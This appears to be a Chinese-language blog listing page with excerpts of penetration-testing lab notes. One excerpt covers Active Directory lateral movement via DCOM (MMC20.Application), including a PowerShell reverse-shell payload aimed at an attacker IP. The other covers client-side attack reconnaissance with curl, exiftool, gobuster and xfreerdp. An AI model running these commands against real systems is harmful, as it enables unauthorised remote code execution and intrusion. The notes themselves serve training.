發表文章

目前顯示的是有「base64」標籤的文章

Active Directory 中的橫向移動 - DCOM

圖片
 Active Directory 中的橫向移動 - DCOM 與 DCOM 的互動透過 TCP 連接埠 135 上的 RPC 執行,並且需要本機管理員存取權限才能呼叫 DCOM 服務控制管理員 接著將透過 FILES04(73) 的目標 IP 指定為 GetTypeFromProgID 方法的第二個參數來實例化遠端 MMC 2.0 應用程式,並將應用程式物件儲存到變數 $dcom 如下 $dcom = [System.Activator]::CreateInstance([type]::GetTypeFromProgID("MMC20.Application.1"," 192.168.200.73 ")) 接著在遠端 DCOM 上執行命令 $dcom.Document.ActiveView.ExecuteShellCommand(" cmd ",$null," /c calc ","7") 一旦執行了上述兩行指令就應該產生一個計算器(小算盤)應用程式的實例 透過指令 tasklist | findstr "calc" 如下,會發現它位於會話 0 內 RDP 登入到 files04(73) 確認如下,可以看到有三個(因為我們執行了 3 次) 目的只是驗證剛剛的指令是有用的 透過我們在 WMI and WinRM 章節學到的,接下來讓我們直接將 Reverse Shell 的指令塞入剛剛的 DCOM 指令中,將 command 換成 Reverse Shell 指令 kali IP : 192.168.45.191 import sys import base64 payload = '$client = New-Object System.Net.Sockets.TCPClient(" 192.168.45.191 ", 4444 );$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -...

客戶端攻擊(Client-Side Attack)

圖片
 客戶端攻擊(Client-Side Attack) 查看檔案 metadata 訊息,第一步透過 curl 下載檔案 curl -o [local file name] [File URL],範例 : └─$ curl -o oldd.pdf http://192.168.187.197/old.pdf 讀檔案 metadata 用指令 exiftool,範例 : └─$ exiftool -a -u oldd.pdf     -a          (-duplicates)        Allow duplicate tags to be extracted -u          (-unknown)         Extract unknown tags 使用 gobuster 查找某網站是否有 PDF 檔案,指令如下 └─$ gobuster -w directory-list-2.3-medium.txt dir -u http://192.168.187.197/ -t 100 -x php 下載 info.pdf,└─$ curl -o info.pdf http://192.168.187.197/info.pdf 一樣 exiftool 看一下 metadata,└─$ exiftool -a -u info.pdf Linux 上透過 RDP 連線到 Windows 使用之指令 xfreerdp 範例 : └─$ xfreerdp -v:192.168.187.196 -u:offsec -p:lab -size:80%  -v : 遠端主機  -u : 遠端登入帳號  -p : 遠端登入密碼  -size : 遠端桌面視窗比例  -drive:davidou,/home/kali_r #掛載遠端硬碟到對方去(davidou 表示網路磁碟機分享名稱),掛載如下圖  -tls-seclevel:0 : 當遇到 win7 或是更早以前的系統時,因為只...